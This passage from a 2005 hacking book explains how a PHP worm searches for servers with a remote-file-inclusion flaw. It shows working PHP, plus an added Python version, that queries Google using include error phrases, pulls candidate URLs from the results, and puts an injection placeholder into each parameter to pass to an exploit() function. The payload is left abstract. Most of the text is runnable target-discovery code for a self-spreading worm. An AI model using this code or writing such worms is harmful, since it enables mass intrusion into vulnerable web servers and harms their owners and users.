The Search

So an abstract worm of this kind could be written, for example, in PHP: the PHP interpreter is installed on a great many web servers, so the worm can run wherever it lands.

As you know, a PHP source code injection vulnerability (an include() whose path is taken from a request parameter) is dangerous: it lets an attacker execute arbitrary code, and therefore obtain privileges, on the server.

This vulnerability is described in detail in Chapter 2, which gives examples of vulnerable systems and scripts, shows how an attacker gains control over the sample systems by exploiting it, and classifies its variants.

The first thing the worm must do after activation is search for vulnerable systems. The simplest approach is to use a well-known search engine such as Google, although any other search engine, or several of them at once, could be used.

Create two string arrays. Each search phrase is built from two strings drawn at random, one from each array. The strings are chosen so that the results are likely to contain links to vulnerable sites: the first array holds fragments of the warnings PHP prints when an include() fails, the second holds words that commonly appear in such pages and in the names of include parameters.

Keywords

 $mainsearch1=array(
     "Failed opening for inclusion",
     "Warning main",
     "failed to open stream",
     "failed",
     "No such file or directory",
     "not found"
 );
 $mainsearch2=array(
     "", "index", "data", "main", "left", "id", "", "menu", "", "", "",
     "and", "error", "", "", "name", "make", "test", "home", "", "", "test",
     "", "list", "right", "temp", "template", "mainpage", "link", "banner"
 );

The empty strings in the second array produce requests that consist of a phrase from the first array alone; because there are many of them, such requests are the most frequent. The worm then requests a random page of the search results.

Google returns only a limited number of results for any query (roughly the first thousand), and the worm's script allows for this by capping the start offset it asks for.

This is how a request to the search engine is built.

A request to the search engine

 global $mainsearch1, $mainsearch2, $explstring;
 $w1=$mainsearch1[rand(0, sizeof($mainsearch1)-1)];
 $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)];
 $w=str_replace(" ", "+", $w1." ".$w2);
 $max=990; // The number of links returned by Google :(
 $start=rand(50, $max);
 $q="http://www.google.ru/search?q=".$w."&hl=ru&lr=&ie=UTF-8&start=$start&sa=N"; //&filter=0
 $rx=file($q);             // fetching a URL with file() requires allow_url_fopen
 $search=implode("", $rx); // the results page as one string

After this code has run, the $search variable holds the HTML of the search results page.

In a more complex situation, or for other search engines, you may have to compose the HTTP request yourself, with the appropriate headers and parameters.

Another variant of a request to the search engine

 global $mainsearch1, $mainsearch2, $explstring;
 $w1=$mainsearch1[rand(0, sizeof($mainsearch1)-1)];
 $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)];
 $w=str_replace(" ", "+", $w1." ".$w2);
 $max=990; // The number of links returned by Google :(
 $start=rand(50, $max);
 $q="GET /search?q=".$w."&hl=ru&lr=&ie=UTF-8&start=$start&sa=N HTTP/1.1\r\n".
    "Host: www.google.com\r\n".
    "User-Agent: Mozilla/5.0 (Windows NT 5.0; en-US; rv:1.7.1) Gecko/20040707\r\n".
    "Accept: */*\r\n".
    "Accept-Language: en-us\r\n".
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n".
    "Connection: close\r\n".
    "\r\n";
 $socket=socket_create(AF_INET, SOCK_STREAM, 0);
 $target=gethostbyname("www.google.com");
 $result=socket_connect($socket, $target, 80);
 socket_write($socket, $q, strlen($q));
 $o="";
 while ($out=socket_read($socket, 2048)) { $o.=$out; } // read until the server closes
 socket_close($socket);
 $search=$o;

After this code has run, the $search variable holds the text of the HTTP response, headers followed by the HTML page.

Now, it is necessary to parse the response to find potentially vulnerable sites.

You can use regular expressions to do this.

Parsing the response

 // Group 1: every URL that has a query string (scheme, host/path, "?", parameters)
 preg_match_all('/(https?:\/\/[\w.\/\\\\%\d\-_]+\?[\w.\/\\\\?\d=&%\-_+]+)/',
                $search, $re);
 unset($rr);
 $rr=array();
 foreach($re[1] as $k=>$v)
 {
     if(!preg_match("/google/", $v)) $rr[]=$v; // skip links back to the search engine
 }

The $rr array then contains the addresses of potentially vulnerable sites; links that point back to Google itself are discarded.

It only remains for the worm to try to infect each of these sites. To do this, it calls an abstract function, exploit().

An attempted infection

 if(sizeof($rr)>0) foreach($rr as $k=>$v)
 {
     // Group 2: parameter name, group 4: parameter value (empty when there is no "=")
     if(preg_match_all('/([&?])(([\w\-_%\d])+)=?(([\w\-_%\d\/\\\\.?+])*)?/', $v, $r))
     {
         // Group 1: everything before the "?"
         preg_match('/^(https?:\/\/([\w.\/\\\\%\d\-_])+)\?/', $v, $r2);
         foreach($r[2] as $k1=>$v1)
         {
             $parts=array();
             foreach($r[2] as $k2=>$v2) // The cross product
             {
                 if($k2==$k1)
                 {
                     if(empty($r[4][$k2])) $parts[]="[*STRING*]";
                     else $parts[]=$r[2][$k2]."=[*STRING*]";
                 }
                 elseif(empty($r[4][$k2])) $parts[]=$r[2][$k2];
                 else $parts[]=$r[2][$k2]."=".$r[4][$k2];
             }
             $x=$r2[1]."?".implode("&", $parts);
             exploit($x);
         }
     }
 }

In this code, an exploitation attempt is prepared for every parameter of every potentially vulnerable URL: the parameters are taken one at a time, the chosen parameter's value is replaced with the [*STRING*] placeholder (a parameter that has no value is replaced as a whole), and the other parameters are left as they were. The exploit() function later substitutes its payload for this placeholder.

For example, suppose the $rr array contains the following URLs:

  • http://site1/1.php?a=123

  • http://site2/test.php?bbb=ccc&qq=abcd

  • http://site3/get.php?abcd

  • http://site3/get.php?abcd&cdef

  • http://site2/test.php?bbb=ccc&qq=abcd&ppp&ddd

Then the $x variable will take the following values in turn:

  • http://site1/1.php?a=[*STRING*]

  • http://site2/test.php?bbb=[*STRING*]&qq=abcd

  • http://site2/test.php?bbb=ccc&qq=[*STRING*]

  • http://site3/get.php?[*STRING*]

  • http://site3/get.php?[*STRING*]&cdef

  • http://site3/get.php?abcd&[*STRING*]

  • http://site2/test.php?bbb=[*STRING*]&qq=abcd&ppp&ddd

  • http://site2/test.php?bbb=ccc&qq=[*STRING*]&ppp&ddd

  • http://site2/test.php?bbb=ccc&qq=abcd&[*STRING*]&ddd

  • http://site2/test.php?bbb=ccc&qq=abcd&ppp&[*STRING*]

Then, an attempt is made to infect each value of the $x variable.
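The two steps described above, extracting query-carrying URLs from the results page and replacing each parameter in turn with the placeholder, as an added example in Python. This is not the page's PHP code: the results page SAMPLE_RESULTS_HTML is constructed, not real search engine output, the hosts are the page's placeholder sites, and the function names are chosen here. PAGE_URLS holds the five URLs from the list above, so the result can be checked against the ten values the text gives for $x.

```python
import html
import re

MARKER = "[*STRING*]"

# Constructed sample of a search-results page (not real search engine output).
# The second link points back at Google and must be skipped; the fifth has no
# query string and is therefore not a candidate; the last is a duplicate.
SAMPLE_RESULTS_HTML = """
<a href="http://site1/1.php?a=123">Warning: main(): Failed opening</a>
<a href="http://www.google.com/search?q=failed&amp;start=60">Next</a>
<a href="http://site2/test.php?bbb=ccc&amp;qq=abcd">failed to open stream</a>
<a href="http://site3/get.php?abcd">No such file or directory</a>
<a href="http://site4/about.php">No query string here</a>
<a href="http://site1/1.php?a=123">same result listed twice</a>
"""

# The five URLs from the worked example in the text.
PAGE_URLS = [
    "http://site1/1.php?a=123",
    "http://site2/test.php?bbb=ccc&qq=abcd",
    "http://site3/get.php?abcd",
    "http://site3/get.php?abcd&cdef",
    "http://site2/test.php?bbb=ccc&qq=abcd&ppp&ddd",
]

# Same character classes as the page's preg_match_all pattern: scheme, then a
# host/path, then "?" and a query string. Any character outside the classes
# (a quote, a ";" or a "#") ends the match.
URL_WITH_QUERY = re.compile(r"https?://[\w./\\%\-]+\?[\w./\\?=&%\-+]+")


def extract_candidates(results_html: str) -> list[str]:
    """Return the distinct URLs with a query string found in a results page,
    skipping links that lead back to the search engine itself."""
    text = html.unescape(results_html)  # href attributes encode & as &amp;
    found: list[str] = []
    for url in URL_WITH_QUERY.findall(text):
        if "google" in url or url in found:
            continue
        found.append(url)
    return found


def placeholder_variants(url: str, marker: str = MARKER) -> list[str]:
    """For a URL with N query parameters return N URLs, each with exactly one
    parameter replaced by the marker (the "cross product" of the page's code).
    A parameter with a value keeps its name ("bbb=[*STRING*]"); a parameter
    without one is replaced as a whole ("[*STRING*]")."""
    base, sep, query = url.partition("?")
    if not sep or not query:
        return []
    params = query.split("&")
    variants = []
    for i, param in enumerate(params):
        name, _eq, value = param.partition("=")
        mutated = list(params)
        mutated[i] = f"{name}={marker}" if value else marker
        variants.append(f"{base}?{'&'.join(mutated)}")
    return variants


def injection_points(results_html: str) -> list[str]:
    """Whole pipeline: results page -> candidate URLs -> one URL per parameter."""
    return [v for url in extract_candidates(results_html)
            for v in placeholder_variants(url)]


if __name__ == "__main__":
    for url in extract_candidates(SAMPLE_RESULTS_HTML):
        print(url)
        for variant in placeholder_variants(url):
            print("   ", variant)
```

Run stand-alone, the script lists three candidate URLs from the constructed page and four placeholder variants in total; the five PAGE_URLS yield exactly the ten values listed above, in the same order. The html.unescape() call matters in practice: result pages write & as &amp; inside href attributes, and the page's pattern, which has no ";" in its character class, would otherwise cut every multi-parameter URL off after its first parameter.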



Hacker Web Exploitation Uncovered
ISBN: 1931769494
Year: 2005
Pages: 77